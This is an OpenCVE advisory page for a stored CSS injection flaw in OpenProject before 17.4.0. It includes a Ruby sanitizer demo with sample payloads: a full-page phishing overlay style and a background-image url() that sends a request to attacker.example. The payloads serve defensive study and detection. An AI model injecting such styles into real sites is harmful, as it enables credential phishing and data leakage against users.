Description
OpenProject is open-source, web-based project management software. Prior to 17.4.0, OpenProject's rich text (markdown) rendering pipeline uses Sanitize::Config::RELAXED[:css] for inline style sanitization. This configuration permits essentially all CSS properties in style attributes on permitted HTML elements (figure, img, table, th, tr, td). As a result, any authenticated user with write access to formattable text fields (work package descriptions, comments, project descriptions, news) can inject arbitrary CSS that is stored and rendered for every viewer of that content. This vulnerability is fixed in 17.4.0.
Published: 2026-06-26
Score: 5.7 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

OpenProject's rich text rendering lets any authenticated user with write access inject arbitrary CSS properties through the style attribute of permitted elements (figure, img, table, th, tr, td). Because the content is stored and rendered for everyone who views it, this Stored CSS Injection can be used to draw full-page phishing overlays on top of the real interface or, via CSS features that trigger outbound requests, to leak information about what is on the page. The CVE is classified as CWE-79 even though no script executes: the root cause is the same failure to neutralize attacker-controlled markup, here the style attribute rather than the element itself. Note that the CVSS vector rates integrity as high and confidentiality as none, so the exfiltration angle named in the title is not reflected in the score.

Affected Systems

The affected software is OpenProject; all releases earlier than version 17.4.0 are vulnerable. The exposed input surface is every field that accepts markdown formatting, including work package descriptions, comments, project descriptions, and news.

Risk and Exploitability

The CVSS score of 5.7 indicates medium severity (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N). Exploitation requires an authenticated account with write access to a formattable field (PR:L) and a victim who opens the rendered content (UI:R), so the pool of possible attackers is limited to such users, but the victims include anyone who views the affected work package, project page or news item, administrators included. Because the EPSS score is unavailable and the vulnerability is not listed in KEV, there is no evidence of active exploitation, but a convincing login or confirmation overlay rendered inside the trusted application is a realistic credential-phishing vector against regular users and administrators alike.

Generated by OpenCVE AI on June 26, 2026 at 21:59 UTC.

Remediation

Fixed in OpenProject 17.4.0 (see Description). No separate vendor workaround is listed on this page.

OpenCVE Recommended Actions

  • Upgrade OpenProject to version 17.4.0 or later
  • Until upgraded, restrict or remove write access to formattable text fields for untrusted users, and review recently edited descriptions, comments and news for style attributes using position, z-index or url() values
  • If patching the code is an option before upgrading, replace Sanitize::Config::RELAXED[:css] in the rendering pipeline with an explicit allowlist of layout-only CSS properties (this is a code-level Sanitize configuration, not an administrative setting)
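As an added illustration (not OpenProject's code and not the Sanitize gem's API), the following Ruby script models the two sanitization modes that the description and the third recommendation contrast: a permissive inline-style filter that keeps every property, which is the behaviour the advisory attributes to Sanitize::Config::RELAXED[:css], and a restricted filter with an explicit property allowlist plus a value check. It also includes a small classifier that flags the properties an overlay or exfiltration payload needs, usable when reviewing stored content. The allowlist, the sample style strings, the regexes and all helper names are assumptions constructed for this example.

```ruby
# Added example: minimal inline-style filters showing why "allow every CSS
# property" is unsafe and what a property allowlist changes. Not OpenProject
# or Sanitize code; the allowlist and sample inputs are constructed here.
require 'set'

# Layout-only properties a sanitizer for figure/img/table cells might keep.
# This list is an assumption for the example, not OpenProject's setting.
SAFE_PROPERTIES = %w[width height text-align vertical-align margin padding
                     border border-collapse float].freeze

# Properties needed to paint something over the real page (phishing overlays).
OVERLAY_PROPERTIES = %w[position top left right bottom z-index opacity].freeze

# Value patterns that must never survive, even for allowed properties:
# external fetches (url(), @import), legacy script hooks, CSS escapes.
FORBIDDEN_VALUE = /url\s*\(|expression\s*\(|@import|\\/i

# Parse "prop: value; prop2: value2" into [[prop, value], ...].
# Values may themselves contain ':' (e.g. url('https://...')), so split
# each declaration only on the first colon.
def parse_declarations(style)
  style.split(';').filter_map do |decl|
    name, value = decl.split(':', 2)
    next if name.nil? || value.nil?
    name = name.strip.downcase
    value = value.strip
    next if name.empty? || value.empty?
    [name, value]
  end
end

# Permissive mode: models the "all properties allowed" behaviour described
# in the advisory. Every declaration is passed through unchanged.
def sanitize_style_permissive(style)
  parse_declarations(style).map { |n, v| "#{n}: #{v}" }.join('; ')
end

# Restricted mode: keep only allowlisted properties whose value contains
# no forbidden construct. Unknown properties are dropped, not escaped.
def sanitize_style_restricted(style, allowed: SAFE_PROPERTIES)
  parse_declarations(style)
    .select { |n, v| allowed.include?(n) && !FORBIDDEN_VALUE.match?(v) }
    .map { |n, v| "#{n}: #{v}" }
    .join('; ')
end

# Review helper: names the properties in a style string that a phishing
# overlay or an exfiltration payload would rely on.
def risky_properties(style)
  parse_declarations(style).filter_map do |n, v|
    next n if OVERLAY_PROPERTIES.include?(n)
    next n if FORBIDDEN_VALUE.match?(v)
    nil
  end
end

# Rewrite every style="..." attribute in an HTML fragment with the given
# filter, dropping the attribute entirely when nothing survives.
# (Regex over attributes is enough for this demo; a real pipeline should
# do this on the parsed DOM, as the Sanitize gem does.)
def rewrite_style_attributes(html)
  html.gsub(/\sstyle="([^"]*)"/) do
    cleaned = yield($1)
    cleaned.empty? ? '' : %( style="#{cleaned}")
  end
end

# Constructed sample payloads of the two kinds the advisory title names.
PHISHING_OVERLAY = 'position: fixed; top: 0; left: 0; width: 100vw; ' \
                   'height: 100vh; z-index: 9999; background: white'
EXFIL_BG = "width: 300px; background-image: url('https://attacker.example/collect?x=1')"

if __FILE__ == $0
  [PHISHING_OVERLAY, EXFIL_BG].each do |payload|
    puts "input:       #{payload}"
    puts "permissive:  #{sanitize_style_permissive(payload)}"
    puts "restricted:  #{sanitize_style_restricted(payload)}"
    puts "risky props: #{risky_properties(payload).inspect}"
    puts
  end
  puts rewrite_style_attributes(%(<img src="x.png" style="#{PHISHING_OVERLAY}">)) { |s|
    sanitize_style_restricted(s)
  }
end
```

In the Sanitize gem the equivalent knob is the :properties array under the :css configuration key; the exact allowlist OpenProject adopted in 17.4.0 is not shown on this page, so check the release's own change before copying the list above. Note that the restricted filter still lets width: 100vw and height: 100vh through, which is harmless without position and z-index but shows that an allowlist alone does not make every surviving value meaningful to review.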

Generated by OpenCVE AI on June 26, 2026 at 21:59 UTC.


Advisories

No advisories yet.

History

Sat, 27 Jun 2026 01:30:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Opf; Opf openproject
Vendors & Products                    Opf; Opf openproject

Fri, 26 Jun 2026 20:15:00 +0000

Type         Values Removed   Values Added
Description                   OpenProject is open-source, web-based project management software. Prior to 17.4.0, OpenProject's rich text (markdown) rendering pipeline uses Sanitize::Config::RELAXED[:css] for inline style sanitization. This configuration permits essentially all CSS properties in style attributes on permitted HTML elements (figure, img, table, th, tr, td). This allows any authenticated user with write access to formattable text fields (work package descriptions, comments, project descriptions, news) to inject CSS This vulnerability is fixed in 17.4.0.
Title                         OpenProject: Stored CSS injection via Sanitize::Config::RELAXED[:css] enables phishing overlays and data exfiltration
Weaknesses                    CWE-79
References
Metrics                       cvssV3_1: {'score': 5.7, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-06-26T19:30:51.285Z

Reserved: 2026-05-07T17:07:09.316Z

Link: CVE-2026-44696

Vulnrichment

No data.

NVD

No data.

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-27T01:15:08Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')